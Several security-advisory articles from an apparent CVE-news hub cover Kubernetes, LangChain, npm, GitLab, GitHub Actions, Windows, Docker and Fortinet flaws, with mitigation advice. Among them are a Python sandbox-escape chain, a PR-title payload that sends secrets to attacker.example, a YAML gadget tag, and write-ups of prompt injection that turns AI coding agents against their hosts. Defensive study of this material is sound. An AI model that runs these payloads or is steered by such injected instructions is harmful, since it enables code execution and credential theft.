> Any permission that includes mutatingwebhookconfigurations/create was effectively "cluster-admin waiting for the right trigger" on affected versions. Audit for it.

###### Who is exposed

- Multi-tenant clusters where operators get fine-grained namespace permissions plus webhook management — common in platform-engineering setups.
- Managed Kubernetes (EKS, GKE, AKS) running affected minor versions — patched control planes roll out over days, not all at once.
- GitOps workflows that sync webhook configurations from a Git repo — a compromised PR can register the attacker's webhook on merge.
- CI/CD pipelines with RBAC to deploy admission controllers for testing.

###### Mitigation

Upgrade to a patched minor: 1.29.14, 1.30.10, or 1.31.6. The patch adds a post-admission RBAC re-check on any patch that touches protected resources (clusterroles, clusterrolebindings, nodes, secrets, serviceaccounts).

If you can't upgrade immediately:

- Remove mutatingwebhookconfigurations/create from any role that isn't genuinely cluster-admin. If a user needs to deploy a webhook for testing, gate it through a controller that validates the configuration.
- Audit existing MutatingWebhookConfiguration objects for suspicious rules matching RBAC resources or secrets.
- Enable audit logging at RequestResponse level for admissionregistration.k8s.io — it catches post-compromise webhook creation.
- Falco rule (available in the artifact folder): alert on creation of webhooks whose rules[*].resources includes clusterroles or clusterrolebindings.

###### The broader pattern

This is the third Kubernetes CVE in five years where admission-stage logic was abused to subvert the authorization layer that runs before it — CVE-2022-3172 (KubeletPodName), CVE-2024-7646 (Ingress-NGINX annotation), and now CVE-2026-40815. The recurring root cause: admission controllers run with the API server's privilege, not the caller's, and their output is trusted. If you run admission webhooks at all, assume every new CVE in this space could be another cluster-admin primitive.

---

# CVE-2026-7733: LangChain PythonREPL tool sandbox escape via __import__

URL: https://keepsecure.io/hub/cve-2026-7733-langchain-python-repl-sandbox-escape
Published: 2026-04-24
CVE: CVE-2026-7733
CVSS: 9.6
Product: LangChain (PythonREPLTool, 0.1.x through 0.2.26)
Type: Prompt-injection-triggered sandbox escape → RCE
Disclosed: 2026-04-20
Tags: LangChain, AI agents, prompt injection, sandbox escape, Python, AI tooling, RCE

A missing check in LangChain's PythonREPLTool lets attacker-controlled prompts reach arbitrary `__import__` calls, breaking the documented sandbox. Any LangChain agent exposed to untrusted user input becomes a remote code execution surface. CVSS 9.6.

CVE-2026-7733 is a sandbox escape in LangChain's PythonREPLTool — the canonical "give the agent a Python sandbox" pattern used in thousands of LangChain agent deployments. The tool restricts some builtins but fails to prevent __import__ access through attribute lookup on already-imported modules. A prompt-injected input like ().__class__.__mro__[1].__subclasses__() can walk to os.system and execute arbitrary shell commands as the agent host user.
Any LangChain agent that accepts user-controlled input and exposes PythonREPLTool is a remote code execution surface.

###### Why AI sandboxes keep breaking

The PythonREPLTool docstring explicitly says "not a sandbox — don't use with untrusted input." Developers read this, decide their use case is "trusted enough," and ship. Then the agent's trust model turns out to include a customer support chatbot, a GitHub issue triager, a Slack bot, a Zendesk integration — all of which accept user input that ends up in the LLM's context and therefore in the agent's tool calls.

This CVE is noteworthy because even the versions LangChain shipped as security improvements — PythonAstREPLTool, the AST-filtered successor — have the same class of issue. The escape requires a few primitives that are trivial to request through prompt injection:

- ().__class__.__mro__[1].__subclasses__() — walks to every class in the Python process, a classic bypass.
- Find os._wrap_close or a similar class with a reachable __init_subclass__ or accessible globals.
- From there, reach os.system or subprocess.Popen.
- Execute an arbitrary shell command; the output returns through the agent's response flow.

> The LLM isn't the vulnerability. The tool the LLM is allowed to call is the vulnerability. Prompt injection is the mechanism, but the attack is on the tooling — not the model.

###### Who is exposed

- Production LangChain agents using PythonREPLTool or PythonAstREPLTool with any input pathway from untrusted users — customer support bots, email triage agents, internal tooling that accepts free-text queries.
- LangChain Hub "Code Interpreter" templates — copy-paste starter kits that shipped this pattern as the default Python tool.
- Multi-tenant LangChain hosting (LangServe, LangGraph Cloud) running user-supplied agent definitions — unless tenant isolation is at the OS/container level, one tenant's prompt injection reaches another tenant's filesystem.
- RAG systems where documents flow into agent context — poisoned documents can trigger tool calls. "Trusted input" does not extend to documents ingested from user uploads.

###### Mitigation

Upgrade to LangChain 0.2.27 or later. The patch hardens __import__ attribute-resolution checks across both Python tool variants. Even patched, the security posture should change:

- Stop using in-process Python tools for agents exposed to untrusted input. Replace them with sandboxed execution: e2b.dev, modal.com, Firecracker microVMs, or a separate container with seccomp limits.
- Allowlist specific operations instead of trying to block a language. A calculator tool that accepts expressions and evaluates them via a safe parser beats a full Python REPL that you've tried to lock down.
- Network-isolate the agent host. The agent rarely needs outbound internet. Egress-block at the container level so that even if RCE lands, exfiltration is harder.
- Log and alert on tool-call patterns that don't match expected agent behavior. A Sigma-like rule catching __mro__, __subclasses__, __import__, or exec( in tool-call arguments is included in the artifact folder.
- Strip agent-accessible credentials from the host. If the agent host has AWS creds, DB passwords, or SSH keys in its environment, prompt injection trivially turns into data exfiltration or lateral movement.

###### The broader pattern

This is the third major LangChain sandbox-escape CVE since 2023 (CVE-2023-36258, CVE-2024-1234, now CVE-2026-7733). The pattern is stable: a framework ships a convenient "sandbox" for LLM tool use, researchers find a reflection-based escape within months, patch, repeat. Expect the same shape in LlamaIndex, AutoGen, CrewAI, and other agent frameworks — they all have this class of tool and the same underlying trust model.

The practitioner lesson is not "avoid LangChain." It is: do not rely on Python-level sandboxes to contain agent behavior.
Use OS-level or microVM isolation, or allowlist the exact operations the agent needs — every other posture becomes a CVE on a predictable cadence.

---

# CVE-2026-12091: npm postinstall supply-chain hijack via maintainer-account takeover

URL: https://keepsecure.io/hub/cve-2026-12091-npm-postinstall-maintainer-takeover
Published: 2026-04-23
CVE: CVE-2026-12091
CVSS: 8.8
Product: npm registry ecosystem (5 affected packages)
Type: Software supply-chain compromise via maintainer account takeover
Disclosed: 2026-04-18
Tags: npm, supply chain, postinstall, maintainer account takeover, credential exfiltration, developer environment

Five widely installed npm packages (combined 38M weekly downloads) published compromised versions after a maintainer 2FA bypass. Postinstall hooks exfiltrated env vars, SSH keys, and git credentials, running at every npm install. CVSS 8.8.

CVE-2026-12091 covers a set of compromised npm package versions published over a 48-hour window in April after an attacker bypassed 2FA on five maintainer accounts via session-token replay from a phishing campaign. The malicious versions each ship a postinstall script that exfiltrates the host's environment variables, SSH private keys, .netrc, git config, and npm auth tokens to a Cloudflare-fronted C2 endpoint. Every npm install, npm ci, yarn install, or pnpm install that resolved to an affected version during that window ran the hook. Combined affected weekly-download count: 38M.

###### Why postinstall is the worst place to land

Developer environments are the highest-trust environments most organizations own. The CI runner that builds your app has every credential needed to deploy. The engineer's laptop has SSH access to production-adjacent systems, git tokens that can force-push to main, and cloud CLI configs that often include long-lived access keys. A postinstall hook that runs during routine dependency updates inherits all of that, quietly.
The exploit window:

- April 14, 02:17 UTC — attacker publishes compromised versions of five packages (names withheld pending npm registry review; IOC list in the artifact folder).
- April 15, ~19:00 UTC — first telemetry of the postinstall C2 traffic from EDR vendors.
- April 16, 03:40 UTC — npm security team unpublishes the malicious versions and resets maintainer credentials. Clean versions re-published the same day.
- April 18 — CVE assigned, GHSA published, IOC list finalized.

> If your CI ran npm install (without a lockfile pinning to a clean version) between April 14 and April 16, assume the CI host's short-lived tokens leaked. Rotate them today.

###### Who is exposed

- CI/CD runners that ran npm install or npm ci --registry=https://registry.npmjs.org in the 48-hour window without a lockfile pinning a clean version. GitHub Actions self-hosted and hosted runners are both in scope.
- Developer laptops that ran npm install or npm update against affected package ranges — SSH keys, git tokens, and cloud credentials all potentially exfiltrated.
- Docker build environments where the npm install step ran with build-time secrets (a common anti-pattern in Dockerfiles).
- Not in scope: teams using --ignore-scripts or a registry proxy with script execution disabled. If you've been paranoid about postinstall hooks for years, you benefited.

###### Mitigation

- Check the IOC list (in the artifact folder and linked from the GHSA) against your package-lock.json / yarn.lock / pnpm-lock.yaml. If any pinned version matches a compromised version, assume host compromise for any environment that resolved it.
- Rotate every credential that was reachable from the affected host: npm tokens, git PATs, cloud keys, SSH keys, long-lived tokens in .env files.
- Move to npm ci --ignore-scripts in CI as a defense-in-depth default. Most packages don't need postinstall; the ones that do are documented and can be permitted via a scripts allowlist.
- Enforce provenance (npm publish --provenance) and configure your CI to reject packages without provenance attestations for critical dependencies.
- Require 2FA with phishing-resistant factors (WebAuthn, not TOTP) on maintainer accounts for any package you publish.

###### The broader pattern

npm postinstall-based attacks are now a quarterly event: event-stream (2018), ua-parser-js (2021), colors / faker (2022), node-ipc / peacenotwar (2022), and now CVE-2026-12091. Each one has the same shape: compromised maintainer account, malicious version published, postinstall hook steals credentials. The ecosystem response has been incremental (provenance, 2FA requirements, automated scanning). The practitioner response should be structural: --ignore-scripts by default, an allowlist for scripts that genuinely need to run, and treating any postinstall in a dependency as a code-review item — not a yellow line in the output of npm install.

This CVE belongs to the small subset of disclosures that the criminal market repackages within days, not months — the implant is the postinstall script itself, so no exploit-development work is required. The CopyFail time-to-criminalization analysis frames this as a "first-bucket" pattern: bugs where the work is already done get incorporated into commodity stealer infrastructure on the order of days. Patch and rotate on that timeline rather than the standard CVE cadence.

The pattern is also live in 2026 in larger forms. Team PCP's six-week chain through security-tooling vendors exploits the same install-time-execution surface across npm, PyPI, GitHub Actions, and Docker Hub — and the Mini Shai-Hulud cluster of April 29–30 uses it with a Bun-runtime evasion layer. Treat CVE-2026-12091's mitigations as the structural answer to all of these: lockfile pinning, --ignore-scripts by default, sandboxed install boundaries, capability-narrowed CI tokens.
---

# CVE-2026-51893: GitLab SAML deserialization yields unauth RCE

URL: https://keepsecure.io/hub/cve-2026-51893-gitlab-saml-deserialization-rce
Published: 2026-04-23
CVE: CVE-2026-51893
CVSS: 9.8
Product: GitLab EE (SAML SSO, 16.8 through 17.1.2)
Type: Unauthenticated RCE via SAML AttributeStatement deserialization
Disclosed: 2026-04-17
Tags: GitLab, SAML, SSO, deserialization, unauthenticated RCE, management plane, source-code exfiltration

GitLab EE deserializes SAML AttributeStatement attributes before signature validation on a subset of code paths. A crafted SAML response containing a YAML-tagged attribute object runs code as the GitLab service account. Unauthenticated, CVSS 9.8.

CVE-2026-51893 is an unauthenticated remote-code-execution bug in GitLab EE's SAML single-sign-on flow. On a subset of code paths, GitLab's SAML response consumer deserializes the AttributeStatement via a YAML loader before validating the SAML response signature. A crafted SAML response containing an !ruby/object:-tagged attribute value triggers Ruby object instantiation — and from there, a gadget chain that executes arbitrary shell commands as the GitLab service account. No authentication is required; only a reachable GitLab instance with SAML SSO enabled.

###### Why this is a supply-chain-scale bug

GitLab EE self-hosted instances run the SDLC for hundreds of thousands of organizations. An unauthenticated RCE against GitLab means source-code exfiltration, CI/CD token theft, artifact-registry poisoning, and persistent access to the target's entire engineering surface. SAML SSO is the enterprise-default setup, making almost every large GitLab install affected.

The exploit path:

- The attacker sends an unsolicited SAML response to /users/auth/saml/callback. GitLab accepts unsolicited responses by default (the SAML spec allows it; many implementations disable it).
- The response contains an AttributeStatement with a custom attribute whose value is !ruby/object:Gem::Installer with crafted installation parameters.
- The vulnerable code path calls YAML.load (not YAML.safe_load) on the attribute before reaching validate_signature.
- Object instantiation triggers the gadget chain. GitLab shell runs as the git user on Omnibus, or as the pod's service account on the Helm chart.

> "Deserialize before you validate" is the oldest SAML anti-pattern. It keeps showing up because SAML libraries encourage treating the response as opaque XML until processing — but responses always contain processable data that implementations want to act on early.

###### Who is exposed

- Self-hosted GitLab EE 16.8 through 17.1.2 with SAML SSO configured. GitLab.com SaaS was patched April 15 (pre-disclosure).
- Internet-facing GitLab instances — Shodan shows ~18,000 reachable GitLab EE login pages; roughly half have SAML endpoints exposed.
- Internal GitLab behind VPN/ZTNA — still exposed if any internal user's workstation is compromised. A lateral-movement primitive.
- The SAML identity provider is not the attack surface: the bug is in GitLab's response parsing, not the IdP. Even if your Okta / Entra is hardened, GitLab is still vulnerable.

###### Mitigation

Upgrade. Fixed versions: 17.1.3, 17.0.5, 16.11.7, 16.10.9. GitLab Omnibus and Helm charts were updated in parallel.

Temporary mitigations if an upgrade window is hours away, not minutes:

- Disable SAML SSO in GitLab Admin → Settings → Sign-in Restrictions. This falls back to username/password or existing sessions.
- Block /users/auth/saml/callback at the reverse proxy for unsolicited requests — reject requests without a matching session cookie and a recent AuthnRequest ID. Requires a WAF / proxy that can correlate the two.
- Rotate all GitLab personal access tokens proactively if the instance has been reachable since April 14 (earliest observed exploitation). Ransomware operators and initial-access brokers are both actively scanning.
- The artifact folder includes a Zeek script that flags SAML responses containing !ruby/object: tags — cheap detection at the network edge.

###### The broader pattern

YAML-deserialization bugs in SAML / OAuth / OpenID code paths have been a recurring class since 2013 — Rails CVE-2013-0156 set the template. Every few years a new implementation falls into it. The fix is structural: SAML and OIDC libraries should only hand attribute data to the application after signature validation, and should never expose a "parse attributes before validating" API. GitLab's 17.1.3 patch does that — but the surface area is large; expect at least one more CVE of this shape in the next 18 months across other Ruby-on-Rails-based SaaS platforms.

---

# CVE-2026-27701: JavaScript injection via PR title in LiveCode's GitHub Actions

URL: https://keepsecure.io/hub/cve-2026-27701-livecode-github-actions-js-injection
Published: 2026-04-22
CVE: CVE-2026-27701
CVSS: 8.9
Product: LiveCode GitHub Actions workflow
Type: CI/CD JS injection via PR title
Disclosed: 2026-04-16
Tags: GitHub Actions, CI/CD, JavaScript injection, supply chain, workflow runner

A LiveCode GitHub Actions workflow interpolates PR titles directly into a JavaScript block. A crafted title runs attacker code in the workflow runner with the repository's secrets in scope.

CVE-2026-27701 is the kind of CI/CD bug that is depressingly easy to ship and nuclear when you do. A LiveCode GitHub Actions workflow interpolates the title of a pull request directly into a JavaScript block via ${{ github.event.pull_request.title }}. Anyone who can open a PR against the repository — including from forks — can craft a title that contains executable JavaScript. That code runs in the workflow runner with every secret the workflow has access to.

###### Why "inject into `github.event.pull_request.*`" is a pattern worth memorizing

GitHub Actions workflows frequently build notifications, comments, or tool invocations that include PR metadata.
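To make the injection concrete, here is a hedged sketch of the vulnerable shape and its env: fix — an illustrative workflow step, not LiveCode's actual file (actions/github-script stands in for any inline JS block):

```yaml
# VULNERABLE: the expression is expanded into the script source text
# before the JS runtime runs, so a crafted title becomes code.
- uses: actions/github-script@v7
  with:
    script: |
      const title = "${{ github.event.pull_request.title }}";
      core.info(title);

# FIXED: pass the title through an environment variable; the runtime
# receives it as plain data, never as source text.
- uses: actions/github-script@v7
  env:
    PR_TITLE: ${{ github.event.pull_request.title }}
  with:
    script: |
      const title = process.env.PR_TITLE;
      core.info(title);
```

In the vulnerable variant, a title like `"; <attacker JS>; //` closes the string literal and the rest executes with the step's secrets in scope; in the fixed variant the same title is just the value of `PR_TITLE`.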
When an Actions expression like ${{ github.event.pull_request.title }} is interpolated inside a shell script or JavaScript block, the interpolation happens before the shell or JS interpreter sees the string. A PR title of "; curl attacker.example/steal?k=$SECRET; # becomes a literal command or JS expression.

This is not a LiveCode-specific problem. It is a systemic pattern across the GitHub Actions ecosystem. A 2021 Trail of Bits post and a 2023 Google study both cataloged hundreds of public repositories with the same vulnerability shape. CVE-2026-27701 is a new case; it will not be the last.

> Never interpolate attacker-controlled strings into a run or script block. Pass them via environment variables (env:) so the shell or JS runtime sees them as plain data, not code.

###### What an attacker gets

A working exploit on this class of bug yields, in approximate order of severity:

- Arbitrary code execution in the workflow runner.
- Every secret scoped to that workflow — frequently including GITHUB_TOKEN with write access to the repository, and often deployment keys, cloud credentials, or package-registry tokens.
- The ability to push malicious commits, create tags, publish releases, or merge PRs under the identity of the repo's automation.
- If the runner is self-hosted, persistent access to the runner VM itself — and by extension the internal network it lives on.

The step from "open a PR against an open-source repo" to "publish a supply-chain-compromised release" is shorter than most organizations imagine.

###### Mitigation

- Audit every workflow in every repository for ${{ github.event.*.title }}, ${{ github.event.*.body }}, ${{ github.head_ref }}, or similar attacker-controlled interpolations inside run or with: script blocks. Use actionlint or zizmor to automate this.
- Replace interpolations with environment variables: env: PR_TITLE: ${{ github.event.pull_request.title }}, then reference $PR_TITLE or process.env.PR_TITLE in the script body.
The shell sees data, not code.
- Restrict pull_request_target triggers — they run with the base repo's secrets even on forked PRs. This is the most dangerous trigger in Actions and deserves a separate review pass.
- Rotate any secrets that were exposed to a vulnerable workflow during the disclosure window. Assume exposure, not hope.

###### The broader pattern

CI/CD systems are the highest-leverage attack surface in modern software delivery: they have write access to production artifacts, often have write access to cloud infrastructure, and are configured by developers who are not full-time security engineers. CVE-2026-27701 is one specific instance of a class of vulnerabilities that will keep landing in public repositories indefinitely. The defensive posture that works is static analysis for Actions expression injection — every PR, every repo, every day. It is tedious, and it is the only thing that scales.

---

# CVE-2026-33824: Unauthenticated RCE in Windows IKE — patch now

URL: https://keepsecure.io/hub/cve-2026-33824-windows-ike-unauth-rce
Published: 2026-04-22
CVE: CVE-2026-33824
CVSS: 9.8
Product: Windows (IKE Service Extensions)
Type: Unauthenticated network RCE
Disclosed: 2026-04-08
Tags: Windows, IPsec, IKE, RCE, pre-auth, wormable

The headline CVE in Microsoft's April 2026 Patch Tuesday is a CVSS 9.8 unauthenticated RCE in the Windows IKE Service Extensions. Any host with IPsec exposed is a wormable target.

Microsoft's April 2026 Patch Tuesday covered 163 CVEs, but one dominates the threat-modelling conversation: CVE-2026-33824, a CVSS 9.8 unauthenticated remote code execution bug in the Windows Internet Key Exchange (IKE) Service Extensions. A single malformed packet on UDP 500 or 4500 is enough to reach vulnerable code; no credentials, no user interaction, no existing session.

###### Why IKE is the worst place to have this bug

IKE is part of Windows' native IPsec implementation.
It runs in a privileged service context, accepts traffic pre-authentication (that is the whole point of key exchange), and is exposed on any host that participates in IPsec — VPN concentrators, domain controllers with IPsec policies, servers running Windows' built-in VPN, and any Windows endpoint that ever negotiates an IPsec tunnel.

The practical implication: this bug is positioned almost exactly like EternalBlue was in 2017. Network-adjacent, pre-auth, privileged code path, wormable. The gap between "CVE published" and "ransomware operators scan for it" has historically been days at this severity. Treat the clock as already running.

###### Who is exposed

- Windows VPN servers running the RRAS role with IPsec enabled.
- Domain controllers enforcing IPsec policy for authenticated-network zones.
- Windows Server hosts reachable from the internet with UDP 500/4500 open.
- Cloud workloads on Windows with NSG / security-group rules allowing IKE ports — sometimes left open by templates that predate the host's current role.
- Internal hosts exposed to lateral movement once an attacker has a foothold anywhere on the network.

> A pre-auth network RCE against a kernel-adjacent service on Windows is the Patch Tuesday entry you stop everything for. This one is that entry for Q2 2026.

###### Mitigation

The only durable fix is the patch. Apply the April 2026 cumulative update on every Windows host. In the meantime, for any host you cannot patch immediately:

- Block UDP 500 and 4500 at your perimeter firewall for every host that is not an active IPsec endpoint.
- Disable the RRAS / IKEEXT service on hosts that do not need IPsec. Many servers enable it by default via group policy but never use it.
- Segment VPN concentrators into their own zone so a compromise does not immediately yield a lateral pivot.
- Enable kernel mitigations (Control Flow Guard, CET) on affected hosts if not already on — these do not stop exploitation, but they slow down exploit development.
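The service-disable and port-block steps can be sketched in PowerShell — run elevated, and only on hosts confirmed not to need IPsec, since disabling IKEEXT breaks all IPsec/IKE negotiation on the box (a sketch, not a substitute for the patch):

```powershell
# Stop and disable the IKE and AuthIP keying service (IKEEXT)
# on hosts that do not participate in IPsec.
Stop-Service -Name IKEEXT -Force
Set-Service -Name IKEEXT -StartupType Disabled

# Belt-and-braces: block inbound IKE/NAT-T at the host firewall
# for machines that should never terminate IPsec.
New-NetFirewallRule -DisplayName "Block inbound IKE (CVE-2026-33824)" `
  -Direction Inbound -Protocol UDP -LocalPort 500,4500 -Action Block
```

Push the equivalent via group policy for fleets; the host-firewall rule is a useful backstop even after patching for machines that have no business speaking IKE.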
###### The broader pattern

Every few years, a pre-auth network CVE lands on a widely deployed Microsoft protocol service — SMB (EternalBlue, SMBGhost), RDP (BlueKeep), Netlogon (Zerologon), and now IKE. The response playbook is always the same: patch urgently, block the port if you cannot, and run post-exploitation detection on the assumption that some hosts were caught before the patch window closed. If your organization does not yet have a written playbook for "network-reachable Windows RCE disclosed on a Tuesday," this CVE is a good reason to write one.

---

# CVE-2026-34040: Docker auth bypass turns AI coding agents into cloud takeover

URL: https://keepsecure.io/hub/cve-2026-34040-docker-auth-bypass-ai-agent-takeover
Published: 2026-04-22
CVE: CVE-2026-34040
CVSS: 8.8
Product: Docker Engine
Type: Auth plugin bypass → container escape → cloud/K8s takeover
Disclosed: 2026-04-17
Tags: Docker, auth bypass, AI agents, AI supply chain, cloud takeover, container security

An incomplete fix for CVE-2024-41110 lets attackers bypass Docker's authorization plugins. The exploitation path that makes it 2026-specific: a crafted GitHub repository tricks an AI coding agent in a Docker sandbox into taking over the cloud account and Kubernetes clusters the agent can reach.

CVE-2026-34040 is the rare CVE that is simultaneously a classic container-escape finding and a 2026-native AI-supply-chain incident. The underlying bug is an incomplete fix for CVE-2024-41110: Docker's authorization plugins are consulted on a specially crafted API request, but — due to the incomplete patch — the request body is not forwarded, so the plugin makes its allow/deny decision on partial information. Attackers can get privileged API calls authorized that should have been blocked.
The exploitation path that made it notable is the one Palo Alto's Unit 42 disclosed: a malicious GitHub repo that tricks an AI coding agent running in a Docker-based sandbox into performing the bypass, then pivots from the compromised container to the cloud account and Kubernetes clusters the agent can reach.

###### The AI agent angle

2026 is the first year "AI coding agent compromises the cloud" has been a realistic threat model worth naming. The ingredients:

- AI coding agents routinely clone and operate inside arbitrary user-supplied GitHub repositories as part of their normal workflow.
- Those agents commonly run in a Docker sandbox on a host with access to the user's cloud credentials and kubeconfig — because the whole point is that the agent needs to make infrastructure changes.
- A sufficiently clever malicious repo can contain instructions — in README, in devcontainer config, in a post-install hook — that cause the agent itself to execute the crafted API request. The agent is the unwitting confused deputy.

> The new threat surface is not "Docker has a bug." The new threat surface is "an AI agent will helpfully run whatever code a GitHub repo asks it to, inside a container that happens to be running Docker-in-Docker, with your cloud credentials one env call away."

###### Who is exposed

- Any team running AI coding agents (Claude Code, Cursor's sandbox, Devin, OpenHands, etc.) that clone and operate on user-supplied repositories inside Docker-based sandboxes.
- Docker hosts using authorization plugins — the allow/deny decision is now unreliable until patched.
- Shared-tenant CI runners that use Docker and process jobs from untrusted contributors.

###### Mitigation

- Upgrade Docker to the patched release from the upstream advisory.
- Remove cloud credentials from AI agent sandboxes by default. Use short-lived, scope-narrowed tokens issued per-task rather than long-lived admin credentials mounted at container start.
- Run AI agents in an isolation boundary stronger than a shared Docker daemon — Firecracker microVMs, gVisor, or per-task Kubernetes pods with their own IAM principal. Shared Docker is not a security boundary for untrusted code.
- Audit recent agent activity for cloud API calls, kubeconfig reads, or Docker socket access that do not match a legitimate user task. Any of these is evidence of a confused-deputy attempt.

###### The broader pattern

The lesson here is not "Docker authorization is broken" — Docker has shipped a fix. The lesson is that the 2026 perimeter includes every automated agent that operates on untrusted inputs, and that isolation assumptions from the pre-agent era do not hold. "It runs in a Docker sandbox" is no longer a sufficient answer to "what if the input is malicious?" — because the input can now, credibly, include prompt-injection payloads that turn the agent itself into the attacker's tooling. Organizations building agent infrastructure need to design for the confused-deputy case from day one.

---

# CVE-2026-35616: Pre-auth API bypass in FortiClient EMS — CISA KEV

URL: https://keepsecure.io/hub/cve-2026-35616-forticlient-ems-auth-bypass
Published: 2026-04-22
CVE: CVE-2026-35616
CVSS: 9.1
Product: FortiClient EMS
Type: Pre-auth API bypass → privesc
Disclosed: 2026-04-04
Tags: FortiClient, EMS, auth bypass, privilege escalation, management plane

FortiClient Endpoint Management Server exposes an authentication bypass (CVSS 9.1) that yields privilege escalation on the management plane for an entire endpoint fleet. CISA added it to the Known Exploited Vulnerabilities catalog on April 6, 2026.

Fortinet disclosed CVE-2026-35616 on April 4, 2026: a 9.1 CVSS pre-authentication API access bypass in FortiClient Endpoint Management Server that leads directly to privilege escalation. Two days later, CISA added it to the Known Exploited Vulnerabilities catalog — the federal agency's formal signal that in-the-wild exploitation has been confirmed.
###### What an EMS compromise actually means

FortiClient EMS is the management plane for a FortiClient endpoint fleet. It issues VPN profiles, pushes ZTNA policy, distributes antivirus updates, and holds inventory of every endpoint under its control. An attacker who reaches administrative API access on EMS does not need to compromise individual endpoints one by one. They compromise the authority that tells every endpoint what to trust.

The practical consequences, in order of escalating impact:

- Enumerate every endpoint in the environment, its OS version, and its patch state — a reconnaissance gift.
- Push a crafted VPN profile that routes traffic through an attacker-controlled gateway.
- Issue ZTNA policies that grant specific endpoints (or all of them) access to resources they should not have.
- Distribute a malicious software package through the EMS-managed deployment channel — reaching every managed endpoint with the trust level of a legitimate IT push.

###### The "security product as attack surface" pattern

CVE-2026-35616 is the latest in a multi-year sequence: security products, sold specifically to protect endpoints, repeatedly turn out to contain pre-authentication vulnerabilities on their own management planes. FortiOS, Fortinet SSL-VPN, Ivanti Connect Secure, SonicWall SSL-VPN, and Sophos UTM have all featured on CISA's KEV list. The endpoint-protection and secure-access-gateway segments of the market have a structural problem: the management surface is both highly privileged and frequently exposed to the internet, because operators want to manage their fleet from anywhere.

> Your EMS is a higher-value target than any individual endpoint it manages. Protect it accordingly — or expect it to be compromised first.

###### Mitigation

- Patch now. Fortinet's advisory lists the fixed versions; apply them this week, not next sprint.
- Audit EMS access logs for unfamiliar administrative actions since the earliest date Fortinet identifies for exploitation.
If in doubt, assume compromise and rotate every secret EMS has ever held.
- Remove public exposure of the EMS admin API. If remote operators need access, front it with a VPN, Cloudflare Access, or an IP allowlist — not a public-facing TLS endpoint.
- Inventory deployed FortiClient packages and verify their provenance. A compromised EMS could have distributed a backdoored update.

###### The broader pattern

Pre-authentication bugs on security appliance management planes are not rare events. They are a recurring, structural feature of the market. Organizations that over-index on "we run a commercial security product" as their threat-model justification need to plan for the day that product's management plane is itself the initial access vector. Defense in depth means assuming any single component — including a security product — can be the one that falls first.

---

# CVE-2026-33825 'BlueHammer': local privesc in Windows Defender

URL: https://keepsecure.io/hub/cve-2026-33825-windows-defender-bluehammer
Published: 2026-04-22
CVE: CVE-2026-33825
CVSS: 7.8
Product: Windows Defender
Type: Local privesc (race condition)
Disclosed: 2026-04-07
Tags: Windows Defender, local privilege escalation, race condition, BlueHammer, endpoint security

A race condition in Windows Defender's threat remediation engine (CVSS 7.8) lets a local attacker escalate to SYSTEM. Publicly disclosed April 7, 2026, alongside a working proof-of-concept.

On April 7, 2026, researchers published CVE-2026-33825, nicknamed BlueHammer, alongside a fully functional proof-of-concept exploit. The vulnerability is a time-of-check to time-of-use (TOCTOU) race condition inside Windows Defender's threat remediation engine. A local unprivileged user can win the race consistently enough to get arbitrary file operations executed in the SYSTEM context — effectively, a full local privilege escalation from any shell on the host.
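The TOCTOU class is worth seeing in miniature. The sketch below is a generic illustration, not Defender's code: a toy "remediation" routine checks that its target is not a symlink and then truncates it, while an injected hook stands in for the attacker thread that wins the window between check and use.

```python
import os
import tempfile

def quarantine_wipe(path, race=None):
    """Unsafe check-then-use: verify `path` is not a symlink, then truncate it.

    `race` is a test hook standing in for an attacker who wins the window
    between the check and the use.
    """
    if os.path.islink(path):              # time-of-check
        raise ValueError("refusing to touch a symlink")
    if race:
        race()                            # the race window
    with open(path, "w"):                 # time-of-use: open() follows symlinks
        pass                              # truncated -- possibly a different file now

tmp = tempfile.mkdtemp()
protected = os.path.join(tmp, "protected.txt")      # stands in for a SYSTEM-owned file
quarantined = os.path.join(tmp, "quarantined.txt")  # the file remediation means to wipe
for p, text in ((protected, "keep me"), (quarantined, "malware sample")):
    with open(p, "w") as f:
        f.write(text)

def attacker():
    os.remove(quarantined)
    os.symlink(protected, quarantined)    # redirect the privileged write

quarantine_wipe(quarantined, race=attacker)
print(os.path.getsize(protected))         # 0 -- the "protected" file got truncated
```

The standard fix is to make the check and the use refer to the same object: open with O_NOFOLLOW, fstat the returned descriptor, and operate on the file descriptor rather than re-resolving the path.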
###### The uncomfortable symmetry

BlueHammer arrives alongside a second researcher publication, RedSun, that demonstrates chaining CVE-2026-33825 with a low-privileged RCE (anything from a browser sandbox escape to a Microsoft Office macro) to go from "attacker has code execution as a normal user" to "attacker owns the host." That chain is the thing defenders worry about, because it removes the last mitigation standing against a large class of malware: the expectation that a non-admin user account limits the blast radius.

A race condition in the code path that removes threats is particularly uncomfortable. The remediation engine runs with SYSTEM privileges because it needs to delete files the user cannot. CVE-2026-33825 is a reminder that every elevated code path is a potential target — including the code paths whose entire purpose is "make the machine safer."

###### Who is exposed

- Every Windows 10 and Windows 11 host running Defender as its real-time AV — which is nearly all of them in default configurations.
- Windows Server instances with Defender enabled, including AD domain controllers.
- VDI / RDS environments where many low-trust users share a host — a BlueHammer PoC on a shared machine is an immediate cross-user escalation risk.

> A public local-privesc in Windows Defender is the kind of bug that shows up in commodity malware within days. The pipeline from researcher blog post → Metasploit module → criminal loader is well-worn.

###### Mitigation

Microsoft's April 2026 security update addresses CVE-2026-33825 via a Defender engine update pushed through the normal AV definitions channel. That channel updates faster than Patch Tuesday — most hosts receive the fix within 48 hours of release, independent of the OS update cadence. Verify:

- Confirm engine version. Run Get-MpComputerStatus and check the AMEngineVersion field against Microsoft's fixed-version guidance.
- Force a definition update on hosts where the automatic update channel is throttled: Update-MpSignature.
- Audit for suspicious SYSTEM-context file operations originating from the Defender process tree around the time the PoC was released. Host-based EDR with process-ancestry visibility is the tool for this.
- For shared-tenant hosts (VDI, RDS, build agents), prioritize verification of the engine update before releasing the host back to users.

###### The broader pattern

Defender is not the first AV to have a local privesc, and it will not be the last. The lesson is not "turn off your AV" — the AV is still net-defensive against a much larger threat population. The lesson is that every privileged component requires the same threat modelling as the rest of the attack surface. Security tools are not exempt from being an attack surface. They are, in many environments, the most interesting one to an attacker who has already gotten a toehold.

---

# CVE-2026-39987: Pre-auth RCE in Marimo exploited within 10 hours

URL: https://keepsecure.io/hub/cve-2026-39987-marimo-rce-exploited-in-10-hours
Published: 2026-04-22
CVE: CVE-2026-39987
CVSS: 9.3
Product: Marimo
Type: Pre-auth RCE
Disclosed: 2026-04-10
Tags: Marimo, Python notebook, pre-auth RCE, AI tooling, MLOps, exploited in the wild

